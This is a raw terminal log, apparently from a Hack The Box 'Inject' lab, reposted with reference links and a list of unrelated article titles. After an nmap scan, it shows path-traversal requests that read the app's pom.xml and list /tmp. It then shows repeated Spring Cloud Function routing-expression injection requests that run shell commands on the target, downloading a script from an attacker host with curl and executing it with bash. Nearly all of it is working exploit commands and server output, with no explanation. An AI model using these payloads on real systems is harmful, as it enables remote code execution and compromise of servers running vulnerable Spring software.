| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.10 seconds┌──(kwkl㉿kwkl)-[/usr/share/metasploit-framework/tools/exploit]
└─$ ┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl "http://10.129.226.252:8080/show_image?img=../../../../../../../var/www/WebApp/pom.xml"curl: (7) Failed to connect to 10.129.226.252 port 8080 after 3118 ms: 没有到主机的路由┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl "http://10.10.11.204:8080/show_image?img=../../../../../../../var/www/WebApp/pom.xml"                                                                               7<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"><modelVersion>4.0.0</modelVersion><parent><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-parent</artifactId><version>2.6.5</version><relativePath/> <!-- lookup parent from repository --></parent><groupId>com.example</groupId><artifactId>WebApp</artifactId><version>0.0.1-SNAPSHOT</version><name>WebApp</name><description>Demo project for Spring Boot</description><properties><java.version>11</java.version></properties><dependencies><dependency><groupId>com.sun.activation</groupId><artifactId>javax.activation</artifactId><version>1.2.0</version></dependency><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-thymeleaf</artifactId></dependency><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-web</artifactId></dependency><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-devtools</artifactId><scope>runtime</scope><optional>true</optional></dependency><dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-function-web</artifactId><version>3.2.2</version></dependency><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-test</artifactId><scope>test</scope></dependency><dependency><groupId>org.webjars</groupId><artifactId>bootstrap</artifactId><version>5.1.3</version></dependency><dependency><groupId>org.webjars</groupId><artifactId>webjars-locator-core</artifactId></dependency></dependencies><build><plugins><plugin><groupId>org.springframework.boot</groupId><artifactId>spring-boot-maven-plugin</artifactId><version>${parent.version}</version></plugin></plugins><finalName>spring-webapp</finalName></build></project>┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/ouned" )' --data-raw 'data' -vNote: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.85.0
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/ouned" )
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 12:32:23 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-03-30T12:32:23.888+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl http://10.10.11.204:8080/show_image?img=../../../../../../tmp.font-unix
.ICE-unix
.Test-unix
.X11-unix
.XIM-unix
anon
EyhPt
hsperfdata_frank
Lxfgz.b64
my_file_raaoot
my_file_root
ouned
pspy64
pspy64.1
ptest
pw
pw.sh
pw.txt
pwn.sh
pwned
root.txt
ss.sh
systemd-private-f6db1a6919514978b689fcad8f4b422d-ModemManager.service-zdMGUf
systemd-private-f6db1a6919514978b689fcad8f4b422d-systemd-logind.service-4PISag
systemd-private-f6db1a6919514978b689fcad8f4b422d-systemd-resolved.service-pYWSXe
systemd-private-f6db1a6919514978b689fcad8f4b422d-systemd-timesyncd.service-NZ0qKg
systemd-private-f6db1a6919514978b689fcad8f4b422d-upower.service-XxKZGg
test.sh
test2.sh
tmp.6smEnRuUbJ
tomcat.8080.16029811924718174421
tomcat-docbase.8080.4454305527216664579
vmware-root_736-2991268455
www.tar.gzcurl: (18) transfer closed with 11565 bytes remaining to read┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$                                                                                                                                                                         18 ⨯┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$                                                                                                                                                                         18 ⨯┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$                                                                                                                                                                         18 ⨯┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$                                                                                                                                                                         18 ⨯┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3/pw.sh -o /tmp/wen.sh")' --data-raw 'data' -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.85.0
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3/pw.sh -o /tmp/wen.sh")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 12:33:53 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-03-30T12:33:53.054+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3/pw.sh -o /tmp/wen.sh")' --data-raw 'data' -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.85.0
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3/pw.sh -o /tmp/wen.sh")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 12:34:11 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-03-30T12:34:11.070+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3:3333/pw.sh -o /tmp/wen.sh")' --data-raw 'data' -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.85.0
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3:3333/pw.sh -o /tmp/wen.sh")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 12:34:37 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-03-30T12:34:37.950+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3:3333/pw.sh -o /tmp/p.sh")' --data-raw 'data' -v
Note: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.85.0
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl http://10.10.16.3:3333/pw.sh -o /tmp/p.sh")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 12:35:14 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-03-30T12:35:14.726+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ curl -X POST  http://10.10.11.204:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash  /tmp/p.sh")' --data-raw 'data' -vNote: Unnecessary use of -X or --request, POST is already inferred.
*   Trying 10.10.11.204:8080...
* Connected to 10.10.11.204 (10.10.11.204) port 8080 (#0)
> POST /functionRouter HTTP/1.1
> Host: 10.10.11.204:8080
> User-Agent: curl/7.85.0
> Accept: */*
> spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash  /tmp/p.sh")
> Content-Length: 4
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 
< Content-Type: application/json
< Transfer-Encoding: chunked
< Date: Thu, 30 Mar 2023 12:35:50 GMT
< Connection: close
< 
* Closing connection 0
{"timestamp":"2023-03-30T12:35:50.325+00:00","status":500,"error":"Internal Server Error","message":"EL1001E: Type conversion problem, cannot convert from java.lang.ProcessImpl to java.lang.String","path":"/functionRouter"}                                                                                                                                                                                 
┌──(kwkl㉿kwkl)-[~/HODL/htb/Inject]
└─$ 

Ref:

1.https://blog.csdn.net/qq_58869808/article/details/129505388

2.https://blog.csdn.net/m0_73998094/article/details/129474782

http://www.lryc.cn/news/44083.html

相关文章:

  • Java Web 实战 15 - 计算机网络之网络编程套接字
  • 基于pdf2docx模块Python实现批量将PDF转Word文档(安装+完整代码教程)
  • 3.21~3.22
  • Chromium 改造实录:增加 MPEG TS 格式支持
  • 性能优化之-事件代理
  • MSDS 即化学品安全说明书
  • 真人手办没法实现网购?我有一个好办法!
  • 2019湖南省大学生程序设计竞赛题解(D)
  • 【开发】中间件——RocketMQ
  • 36 UnitTest框架 - 参数化
  • Qt源码阅读(四) 事件循环
  • 银行数字化转型导师坚鹏:银行数字化领导力提升之道
  • Vue2 -- 自定义单选内容的单选框组件
  • 让PyTorch训练速度更快,你需要掌握这17种方法
  • LeetCode-309. 最佳买卖股票时机含冷冻期
  • AUTOSAR知识点Com(七):CANSM初认知
  • 递归:斐波那契数列、递归实现指数型枚举、递归实现排列型枚举
  • oracle模糊查询时字段内容包含下划线的解决办法
  • C++:explicit关键字
  • 【C5】bmc wtd,post
  • 200.Spark(七):SparkSQL项目实战
  • 区块链系统:挖矿原理
  • 【博弈】【清华冬令营2018模拟】取石子
  • 嵌入式:BSP的理解
  • Linux主机Tcpdump使用-centos实例
  • 线性DP——AcWing 898. 数字三角形、AcWing 895. 最长上升子序列
  • SpringMVC
  • C++模板基础(二)
  • 什么是linux内核态、用户态?
  • day8—选择题